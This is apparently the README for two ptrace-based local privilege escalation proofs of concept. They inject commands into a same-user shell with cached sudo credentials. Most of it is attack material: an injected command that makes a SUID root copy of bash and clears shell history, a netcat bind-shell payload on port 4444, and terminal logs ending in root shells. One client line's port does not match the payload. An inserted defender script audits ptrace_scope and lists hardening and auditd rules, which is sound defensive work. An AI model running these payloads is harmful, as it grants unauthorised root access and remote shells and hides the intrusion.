ptrace misconfiguration Local Privilege Escalation

Please consider making a donation:

WARNING! this is a POC, the code is CRAP

Why this POC? Why ptrace for this? Just for fun. I know, I know, you can get sudo control in other ways x)

Video demo on YouTube:

Injecting code via ptrace (with same user) in shells with sudo authenticated

Exploit Reqs:

  • ptrace enabled so the attacker can attach to the user's own processes
  • terminal with a user in the sudo group (attacker)
  • terminal with the same user & sudo already authenticated (victim)
  • run xpk or ptrex
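
A defender-side check for the first requirement above, added here as an example (not part of xpk or ptrex): it classifies the Yama ptrace_scope value, flags the same-uid attach the PoC relies on, and prints the hardening and auditd rules a practitioner would apply. It reads a stand-in file when given a path so it can run offline; the auditd rule keys (`-k`) are names chosen for this example.

```shell
#!/bin/sh
# Added example, not part of xpk/ptrex: audit the precondition this PoC needs
# (a ptrace_scope letting any same-uid process attach) and print the hardening
# a defender would apply. The path argument lets it run against a stand-in file.

# Meaning of each Yama ptrace_scope value (kernel Documentation/admin-guide/LSM/Yama.rst).
ptrace_scope_meaning() {
    case "$1" in
        0) echo "classic: any process may attach to any same-uid process" ;;
        1) echo "restricted: attach only to descendants or PR_SET_PTRACER targets" ;;
        2) echo "admin-only: CAP_SYS_PTRACE required to attach" ;;
        3) echo "disabled: no attach at all; cannot be lowered without a reboot" ;;
        missing) echo "Yama not loaded: plain DAC rules, same-uid attach allowed" ;;
        *) echo "unexpected value: $1" ;;
    esac
}

# Read the sysctl, or a stand-in file; print "missing" when Yama is absent.
read_ptrace_scope() {
    file="${1:-/proc/sys/kernel/yama/ptrace_scope}"
    if [ -r "$file" ]; then tr -d '[:space:]' < "$file"; else echo missing; fi
}

# True when a same-uid attacker can attach to a shell holding a sudo timestamp.
ptrace_scope_is_weak() {
    [ "$1" = "0" ] || [ "$1" = "missing" ]
}

# auditd rules recording the ptrace requests an injector issues: PTRACE_ATTACH (0x10),
# PTRACE_POKETEXT (0x4), PTRACE_SETREGS (0xd). -k names chosen here; add arch=b32 twins for 32-bit tracers.
suggested_audit_rules() {
    cat <<'EOF'
-a always,exit -F arch=b64 -S ptrace -F a0=0x10 -k ptrace_attach
-a always,exit -F arch=b64 -S ptrace -F a0=0x4 -k ptrace_poketext
-a always,exit -F arch=b64 -S ptrace -F a0=0xd -k ptrace_setregs
EOF
}

# Print the finding; returns 1 when the host is exposed, 0 otherwise.
report() {
    scope=$(read_ptrace_scope "$1")
    echo "ptrace_scope = $scope ($(ptrace_scope_meaning "$scope"))"
    ptrace_scope_is_weak "$scope" || return 0
    echo "HARDEN: sysctl -w kernel.yama.ptrace_scope=1 (persist it under /etc/sysctl.d/)"
    echo "HARDEN: set 'Defaults timestamp_timeout=0' in sudoers, or run 'sudo -K' after"
    echo "        using sudo, so no cached credential is left for an injected command"
    echo "DETECT: load these auditd rules:"
    suggested_audit_rules
    return 1
}
```

Run `report` with no argument to check the live sysctl; a non-zero exit means a same-uid shell with a cached sudo timestamp is reachable via ptrace on this host.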

WARNING: if GDB is installed on the machine, it is safer to run the original POC:

'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

My code is based on the s4vitar & vowkin POC and uses ptrace directly (no GDB dependency).

I made two POC flavours of the same thing: xpk.c & ptrex.c

Do you want more advanced stuff? Check


xpk.c: stdin hijack (using the ptrace_do lib): sudo -S cp /bin/bash /tmp + sudo -S chmod +s /tmp/bash + history -c

gcc -o xpk xpk.c

WARNING: only works on x86_64 systems (ptrace_do limitation)

  • can inject code from an x86_64-compiled xpk into an x86_64 process
  • can inject code from an x86_64-compiled xpk into an x86 process


ptrex.c: shellcode injection (using ptrace) that execve()s: python -c 'import os; os.system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")'

gcc -o ptrex ptrex.c

You can also inject your own python code:

./ptrex full_python_path newcmdline

Example with:

  • your own python binary (limit 150 bytes): /home/dreg/tmp/python
  • bind bash shell python code (limit 250 bytes): import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")

./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'

  • works on x86_64 systems & x86 systems
  • can inject code from an x86_64-compiled ptrex into an x86_64 process
  • can inject code from an x86-compiled ptrex into an x86 process
  • can inject code from an x86_64-compiled ptrex into an x86 process

WARNING: injecting code from an x86-compiled ptrex into an x86_64 process is not possible

How to test xpk.c:

Open a terminal with a user in the sudo group

Execute any command with sudo and enter the password, e.g.:

dreg@fr33project:~$ tty
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:

Open another terminal with the same user and execute ./xpk (the name of the exploit executable is important, don't change it!)

dreg@fr33project:~$ tty
dreg@fr33project:~$ gcc -o xpk xpk.c
dreg@fr33project:~$ ./xpk
David Reguera Garcia aka Dreg exploit without gdb dep, based in:
'ptrace_scope' misconfiguration Local Privilege Escalation
Authors: Marcelo Vazquez  (s4vitar)
         Victor Lasa       (vowkin)

[*] PID -> bash
[*] Path 2660: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2892: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> sh
[*] Path 2998: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2999: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap

[*] Cleaning up...
[*] Spawning root shell...
bash-5.0# id
uid=1003(dreg) gid=1003(dreg) euid=0(root) egid=0(root) groups=0(root),27(sudo),1003(dreg)
bash-5.0# whoami

How to test ptrex.c:

Open a terminal with a user in the sudo group

Execute any command with sudo and enter the password, e.g.:

dreg@fr33project:~$ tty
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:

Open another terminal with the same user and execute ./ptrex

dreg@fr33project:~$ tty
dreg@fr33project:~$ gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex
ptrex v0.3-beta - MIT License - Copyright 2020
David Reguera Garcia aka Dreg - [email protected] -
ptrace misconfiguration Local Privilege Escalation
using ptrace (no GDB dep) execve
Based from:
'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

To change default python path & cmd injected: ./ptrex full_python_path newcmdline
    example: ./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'

/proc/sys/kernel/yama/ptrace_scope : 0
pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d'
current pid: 18888
skipping current shell pid: 18888
current pid: 20156
elf plat: 64
waiting for process
getting registers
injecting shellcode at: 0x00007f33a88890e9
setting instruction pointer to: 0x00007f33a88890e9
please wait...
found suid shell: /tmp/bash
/tmp/bash -p -c 'rm /tmp/bash ; tput cnorm && /bin/bash -p'

bash-5.0# whoami

If this fails, try the bind shell example.

Example ptrex.c bind shell netcat

This example needs netcat installed on the machine

Open a terminal with a user in the sudo group

Execute any command with sudo and enter the password, e.g.:

dreg@fr33project:~$ tty
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:

Open another terminal with the same user and execute ./ptrex

dreg@fr33project:~$ tty
dreg@fr33project:~$ gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex /usr/bin/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
dreg@fr33project:~$ nc 444

Tested on:

  • Parrot Home/Workstation: 4.6
  • Parrot Security: 4.6
  • CentOS / RedHat: 7.6
  • Kali Linux: 2018.4
  • Debian GNU/Linux: 10 (buster), 9.13 (stretch)

